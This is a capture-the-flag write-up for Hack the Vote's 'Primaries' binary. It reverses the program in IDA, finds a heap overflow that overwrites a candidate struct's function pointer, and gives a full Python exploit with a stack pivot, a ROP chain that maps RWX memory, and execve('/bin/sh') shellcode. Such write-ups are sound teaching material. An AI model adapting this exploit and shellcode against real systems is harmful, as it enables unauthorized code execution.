Hack the Vote: Primaries

This writeup is for a relatively easy challenge called Primaries from Hack the Vote. I decided to write it up since no one else had published one yet. It is probably too in depth for experienced reversers but for those who would like a detailed walkthrough please read on. The full exploit code is at the bottom.

Download it here.

Here is the challenge text:

The first stage of any election are the primaries. Unfortunately, only entertainment figures registered for the ballot! See if you can get in and get some real candidates on there. Having a TV personality as President would be a disaster.

Running file on the binary gives the following:
> file primaries
primaries: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=706325df9cac64ee44ea3c466cdf5b0c71bb3f67, stripped

Seeing that this is a 32 bit ELF I set up a 32-bit Ubuntu machine using vagrant. A quick execution test gives you this:

vagrant@vagrant-ubuntu-trusty-32:/vagrant/primaries$ ./primaries
Please enter your full name:
hj
Please enter your SSN:
1234
Please enter your date of birth:
1234
Please enter the candidate you are voting for:
(1) David Hasselhoff
(2) Arnold Schwarzenegger
(3) Stephen Colbert
(4) write-in
4
Who do you want to vote for?
Yodog
Please enter your full name:

So you can see that there is some kind of a loop and menu interface. Now time to open this in IDA which, because it is statically compiled is gross. Instead of diving into the loading code I found it easier to just look for strings. I found the string “Please enter your full name:\n” referenced at 0x8048F67. I named this sub InitialMenu. This string is passed to the function at 0x08050210 which after a cursory glance seems to be the libc function puts.

The function call in InitialMenu at 0x08048F9A appears to wait to receive data after the prompting from puts so I label it read.

A format string is passed to the function call at 0x0804902D so I label this one printf.

The format string “%lu” and a buffer are passed to the function call at 0x08048FC9 so I label it scanf since it also waits for input.

The switch/if statement at 0x0804909A handles the choice that you enter.

Looking at the code from 0x08049026-0x0804904C you can see that the printing of the menu is done via format strings.


.text:0804901F mov eax, [ebp+arg_4]
.text:08049022 mov [esp+4], eax
.text:08049026 mov dword ptr [esp], offset a1S ; "\t(1) %s\n"
.text:0804902D call printf
.text:08049032 mov eax, [ebp+arg_8]
.text:08049035 mov [esp+4], eax
.text:08049039 mov dword ptr [esp], offset a2S ; "\t(2) %s\n"
.text:08049040 call printf
.text:08049045 mov eax, [ebp+arg_C]
.text:08049048 mov [esp+4], eax
.text:0804904C mov dword ptr [esp], offset a3S ; "\t(3) %s\n"
.text:08049053 call printf
.text:08049058 mov dword ptr [esp], offset a4WriteIn ; "\t(4) write-in"
.text:0804905F call puts

At this point it would be a good idea to check out the parent function. Checking the Xrefs to InitialMenu reveals only a single call at 0x080494E8. Scrolling to the top of the function you can see what appears to be ASCII being put into a buffer. Hitting ‘r’ on each of these shows them to be the strings we saw previously on the menu.

Here you can see the string “David Hasselhoff” being copied into a buffer.


.text:08049418 mov eax, [esp+2Ch]
.text:0804941C mov dword ptr [eax], 'ivaD'
.text:08049422 mov dword ptr [eax+4], 'aH d'
.text:08049429 mov dword ptr [eax+8], 'less'
.text:08049430 mov dword ptr [eax+0Ch], 'ffoh'
.text:08049437 mov byte ptr [eax+10h], 0

Now it is time to trace back from where the buffer stored at esp+2ch comes which turns out to be here sub_8048E46. Browsing to this and it looks similar to the type of code you see in a C++ constructor so I label it as such despite this not actually being written in C++.

You can see that the return value comes from eax and tracing this back shows that it comes from here:


.text:08048E4C mov dword ptr [esp], 10Ch
.text:08048E53 call sub_8059DD0
.text:08048E58 mov [ebp+var_C], eax

Knowing that this ELF is statically compiled this looks a lot like a signature for malloc. I opened up the function briefly and scrolled through it. It wasn’t long before I found a reference to malloc.c at 0x08059EBC which confirmed my suspicions. This function is now labeled malloc.

Just after the call to malloc is this:


.text:08048E5E mov dword ptr [esp+8], 100h
.text:08048E66 mov dword ptr [esp+4], 0
.text:08048E6E mov [esp], eax
.text:08048E71 call sub_8048270

Which looks remarkably like a call to memset so I label it as such. The code then initialized offsets 0x104 and 0x108 to ‘0’ while offset 0x100 gets a pointer to sub_8048E24. This sub prints ‘ declare myself the winner!’ to the screen. I label it winner_func. At this point I also create a structure in IDA. Because this is the structure that the candidate data is written to I call it candidate_struct. If you remember the earlier function where the names are copied into the buffer we can assume that the first 0x100 bytes that are memset hold the candidates name. It initially looks like this:


00000000 candidate_struct struc ; (sizeof=0x10C, mappedto_1)
00000000 candidate_name db 256 dup(?)
00000100 winner_func_ptr dd ?
00000104 field_104 dd ?
00000108 field_108 dd ?
0000010C candidate_struct ends

Let’s go back to the previous function that called the “constructor”. There is a loop that checks if the value at esp+28h is less than 0x63. If so then it goes down the branch that calls InitialMenu otherwise it follows a branch that eventually exits.

Following the less than branch we see an immediate call to sub_8048EA2. This function allocates three buffers, one 0x10 and two 0x100 in size. The two 0x100 buffers are stored at offsets 0 and 0xC in the 0x10 size buffer which means that the smaller is some sort of structure. Here is what it looks like so far:


00000000 unknown struc ; (sizeof=0x10, mappedto_2)
00000000 buff_1 dd ?
00000004 field_4 dd ?
00000008 field_8 dd ?
0000000C buff_2 dd ?
00000010 unknown ends

A few instructions after the call to the structure initialization function you see the call to InitialMenu. Given what we now know the prototype is something like this:


InitialMenu( SomeStruct, Hasselhoff, Arnold, Colbert, Some4ByteBuff, SomeInteger);

Back in InitialMenu let’s take a look at the selection switch statement. If we select ‘1’ we jump to loc_80490BD. At 0x080490C3 the Hasselhoff structure is copied into offset 8 in our unknown structure. Additionally, the value at offset 0x104 in the Hasselhoff structure is incremented. Selection ‘2’ does the same thing except that it uses the Arnold structure. So from this we can deduce that field 8 is the last vote selected and offset 0x104 is probably a count of votes for a candidate. One thing to note here is that if you select 1 then it just falls through to selection 2 and so on. So this is either a series of if statements or it is a switch statement without any break keywords in the case blocks.

At loc_8049117 the candidate structure initialization function is called again presumably to handle the one we are about to enter. We are then prompted to enter a candidate’s name.

.text:08049145 mov dword ptr [esp+4], 120h
.text:0804914D mov [esp], eax
.text:08049150 call read

What jumps out here though is the read of 0x120 bytes. The allocation for this buffer occurred here:

.text:08048E4C mov dword ptr [esp], 10Ch
.text:08048E53 call malloc
.text:08048E58 mov [ebp+var_C], eax

Clearly this has to be the bug. Something to remember is that at offset 0x100 there is a function pointer. Before I write a script to trigger this let’s keep reversing a bit. At 0x080491D2 there is a compare against a local variable that was initialized at 0x08049155 which is probably a counter. If the counter is less than the supplied argument execution continues to loc_804915E. Here is the comparison:

loc_80491CF:
mov eax, [ebp+counter]
cmp eax, [ebp+arg_14]
jl short loc_804915E

Following the argument back to the calling function we see that it is incremented by one at 0x080494C1 every time InitialMenu returns a non-zero eax.

The next code snippet is a good example of accessing an array. You take the size of each entry and multiply it by some index or counter. Finally you add this value to the base of the array to get a pointer to the desired entry.

.text:08049161 mov eax, [ebp+counter]
.text:08049164 lea ecx, ds:0[eax*4]
.text:0804916B mov eax, [ebp+arg_10]
.text:0804916E add eax, ecx
.text:08049170 mov eax, [eax]

The value in arg_10 comes from 0x080494C1 and is a stack pointer used to hold pointers to each candidate struct. At 0x08049179 the pointer to the new candidates name as well as to the one referenced by the current counter are passed to a function. The return value is then compared to 0. If it is non-zero then the loop continues, otherwise it breaks out. This is exactly how a strcmp would behave so I label it as such.

If the strings are identical execution moves into 0x08049182. The vote count for the candidate is increased by 1 at 0x080491B3. Finally, the previously allocated structure for the write-in candidate is passed to a function and forgotten. This is likely the free function. The register eax is set to 0 and the function exits.

However, if the strcmp never returns 0 then 0x080491D7 is reached and the return value of the function becomes a pointer to the new candidate structure. Remember that arg_14 was incremented only when eax returned a value? This argument must be the candidate count.

Back in the main loop function we see the new candidate added to the array at 0x08049507 and a pointer to the last vote is added to the array at 0x08049522. The total votes counter is also incremented at 0x08049529.

What happens after we have hit 0x63 votes? Well, we reach the block at 0x08049539 in which we find a call to sub_8049214. The arguments to this function are Hasselhoff, Arnold, Colbert, the candidate pointer array, and the candidate count. Going into the sub we see this odd stuff:

.text:0804921A mov eax, [ebp+hasselhoff]
.text:0804921D mov eax, [eax+candidate_struct.total_votes]
.text:08049223 mov edx, 0CCCCCCCDh
.text:08049228 mul edx
.text:0804922A shr edx, 3
.text:0804922D mov eax, [ebp+hasselhoff]
.text:08049230 mov [eax+candidate_struct.field_108], edx

A quick internet search for the instructions tells me that that is a way to divide by 10. So what is happening in this first chunk of the function is that the total votes for each of the three main candidates are being divided by 10 and stored in field 0x108. The next loop beginning at loc_80492BC does the same thing though for all of the write-in candidates.

At 0x080492EB field_108 for Hasselhoff is stored in var_10 while the Hasselhoff pointer is stored in var_C. Continuing on you can see that field_108 from each candidate is compared to the one stored in var_10. If it is greater then var_10 is updated and var_C is set with the pointer to the highest valued field_108. The loop beginning at loc_8049391 goes through each of the write-ins. The end result is that a pointer to the candidate with the most votes ends up in var_C and their field_108 is in var_10.

Once the loop completes var_10 is compared to 0. If it is 0 then “‘There was no winner, no delegates were received!” is printed and the function exits. Knowing this we can update field_108 to be delegates. Here is what the struct looks like entirely.

00000000 candidate_struct struc ; (sizeof=0x10C, mappedto_1)
00000000 candidate_name db 256 dup(?)
00000100 winner_func_ptr dd ?
00000104 total_votes dd ?
00000108 delegates dd ?
0000010C candidate_struct ends

However, if there are delegates then the block at 0x804939F is reached. Now here is where the interesting part comes.

.text:080493BF mov eax, [ebp+head_candidate]
.text:080493C2 mov eax, [eax+candidate_struct.winner_func_ptr]
.text:080493C8 call eax

We see here the winner function pointer is taken from the winning structure and called. With all we know now we can make a script to trigger this behavior. We need to overwrite the winner function pointer and control the total votes to ensure that the corrupted candidate is the winner. 🙂 Realize that we also control the delegates field indirectly through the vote counts. Here is the basic script:

import sys
import socket
import telnetlib
import struct

def readuntil( s, l):
z = ”
while z.endswith(l) == False:
z += s.recv(1)

return z

def readline( s ):
return readuntil( s, ‘\n’)

def enterjunk(s):
readline(s)
s.send(‘hj\n’)
readline(s)
s.send(‘69696969\n’)
readline(s)
s.send(‘69696969\n’)

def readmenu(s):
enterjunk(s)
readuntil(s, ‘in\n’)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))

raw_input(‘Connect’)

for i in range(99):
readmenu(s)
s.send(‘4\n’)
readuntil(s, ‘?’)
s.send(‘yodog\n’)

readmenu(s)
s.send(‘4\n’)
readuntil(s, ‘?’)

candidate = ‘a’*0x100
candidate += struct.pack(‘I’, 0x41414141) # winner_func
candidate += struct.pack(‘I’, 0x42424242) # votes

s.send(candidate + ‘\n’)

print ‘Interactive…’

t = telnetlib.Telnet()
t.sock = s
t.interact()

Launching the challenge with nc.traditional, starting the exploit and attaching with gdb gives a SIGSEGV

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

Now, with PC control comes great responsibility. Since this is not a stack overwrite we need to find a way to gain control of execution flow either by a stack pivot or a call to system or exec*. To save us the time, I did a quick search and did not find any of those groups of functions. That means we need to find a stack pivot. What this means is finding a way to make esp point to data that we control. This begins by first finding our data on the stack.

Here is what I found:

(gdb) x /20wx $esp
0xbfa8966c: 0x080493ca 0x080eb200 0x086ff1a8 0x080eb360
0xbfa8967c: 0x00000000 0x00000000 0x00000002 0x06a039d3
0xbfa8968c: 0x086ff1a8 0x00000000 0x00000000 0xbfa89a08

Examining each of these reveals that 0x086ff1a8 points to the winning candidates data of which there are two instances on the stack. Additionally, you can see the value 0x06a039d3 which when multiplied by 10 is 0x4242423e, pretty close to our vote count.

The easiest stack pivot to search for is the sequence pop esp; ret. To search for gadgets I use ROPGadget by Jonathan Salwan which you can get here. Follow the instructions on his site for download and installation. Here is the command to find the gadgets:

ROPGadget --binary primaries > gadgets.txt

Before I can use a pop esp gadget I need to have the stack in the correct position. For this I need to find a gadget that adds 0x1c to esp before the next return. Using the ROPGadget tool I found just what I needed at 0x080be2b0 as well as a “pop esp” at 0x080bb8d6.

0x080be2b0 : add esp, 0x14 ; pop ebx ; pop edi ; ret
0x080bb8d6 : pop esp ; ret

This will cause the next return address to be located at 0xbfa89688 which is our delegate count. To make this correctly point to the pop esp gadget we need to set the vote count to be 10x the actual value we want which is 0x5075385c. Here are the two updated lines and what an example run looks like.

candidate += struct.pack('I', 0x080be2b0) # winner_func
candidate += struct.pack('I', 0x5075385c) # votes

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) x /4x $esp
0x93a11ac: 0x61616161 0x61616161 0x61616161 0x61616161
(gdb)

You can now see that we have gained control of the stack and can begin with our ROP chain. In most cases the tasks we want to accomplish are:

  1. Get an RWX buffer (probably using mmap)
  2. Get code into that buffer
  3. Jump into the buffer.

In looking through the code I found the following wrapper function around int 80 which is used to invoke Linux Syscalls.

.text:0806FBC0 sub_806FBC0 proc near
.text:0806FBC0 int 80h
.text:0806FBC2 retn
.text:0806FBC2 sub_806FBC0 endp

Here are some gadgets that I found that will probably help you to finish the ROP chain.

0x0804846e : pop esi ; pop edi ; ret
0x0806f520 : pop edx ; pop ecx ; pop ebx ; ret
0x0804846f : pop edi ; ret
0x0806f4fa : pop edx ; ret
0x080662f2 : mov dword ptr [edx], eax ; mov eax, edi ; pop edi ; ret

The final script that I wrote with a successful exploit is:

import sys
import socket
import telnetlib
import random
import string
import struct

def readuntil( s, l):
z = ”
while z.endswith(l) == False:
z += s.recv(1)

return z

def readline( s ):
return readuntil( s, ‘\n’)

def enterjunk(s):
readline(s)
s.send(‘hj\n’)
readline(s)
s.send(‘69696969\n’)
readline(s)
s.send(‘69696969\n’)

def readmenu(s):
enterjunk(s)
readuntil(s, ‘in\n’)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))

for i in range(99):
readmenu(s)
s.send(‘4\n’)
readuntil(s, ‘?’)
s.send(‘yodog\n’)

readmenu(s)
s.send(‘4\n’)
readuntil(s, ‘?’)

# pop eax; ret
pop_eax = struct.pack(‘I’, 0x080bb926)
int80 = struct.pack(‘I’, 0x0806FBC0)

# 0x0804846e : pop esi ; pop edi ; ret
pop_esi_edi = struct.pack(‘I’, 0x0804846e)
#0x0806f520 : pop edx ; pop ecx ; pop ebx ; ret
pop_edx_ecx_ebx = struct.pack(‘I’, 0x0806f520)
# 0x0804846f : pop edi ; ret
pop_edi = struct.pack(‘I’, 0x0804846f)
# 0x0806f4fa : pop edx ; ret
pop_edx = struct.pack(‘I’, 0x0806f4fa)
# 0x080662f2 : mov dword ptr [edx], eax ; mov eax, edi ; pop edi ; ret
www = struct.pack(‘I’, 0x080662f2)

data = pop_esi_edi
data += struct.pack(‘I’, 0x22) # esi
data += struct.pack(‘I’, 0xffffffff) ## edi
data += pop_edx_ecx_ebx
data += struct.pack(‘I’, 0x7) ## edx
data += struct.pack(‘I’, 0x1000) ## ecx
data += struct.pack(‘I’, 0x41410000) ## ebx)

data += pop_eax
data += struct.pack(‘I’, 0xc0) ## mmap
data += int80

f = open(‘shellcode’, ‘rb’)
sc = f.read()
f.close()
sc = ‘\x90’*(4- len(sc)%4) + sc

if len(sc) > 48:
print ‘this will not work’

base = 0x41410000

## initial setup
data += pop_eax
data += sc[:4]
sc = sc[4:]

data += pop_edx
data += struct.pack(‘I’, base)
base += 4

data += pop_edi
data += sc[:4]
sc = sc[4:]

while len(sc):
data += www
data += sc[:4] # becomes edi
sc = sc[4:]
data += pop_edx
data += struct.pack(‘I’, base)
base += 4

data += www
data += ‘cccc’ # becomes edi
data += pop_edx
data += struct.pack(‘I’, base)
base += 4
data += www
data += ‘cccc’

data += struct.pack(‘I’, 0x41410000) ## next ret value

data += ‘a’*(0x100 – len(data))

## This will make it possible for the next return address to be that of the delegate count
## Delegate count is calculated via the number of votes / 10
data += struct.pack(‘I’, 0x080be2b0) ## add esp, 0x14; pop; pop; ## winner func
# 0x080bb8d6 : pop esp ; ret
# The address is multiplied by 10 because the stack pivot is the number of votes / 10
data += struct.pack(‘I’, 0x080bb8d6*10) # votes

s.send(data + ‘\n’)

print ‘Interactive…’

t = telnetlib.Telnet()
t.sock = s
t.interact()

The assembly for the shell code file is:

BITS 32

start:
xor eax, eax
mov al, 63 ; dup2
xor ebx, ebx
mov ecx, 3
int 0x80

xor eax, eax
mov al, 63
inc ebx
int 0x80

push 0x68732f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
push ecx
mov ecx, esp
xor edx, edx
mov al, 11 ; execve
int 0x80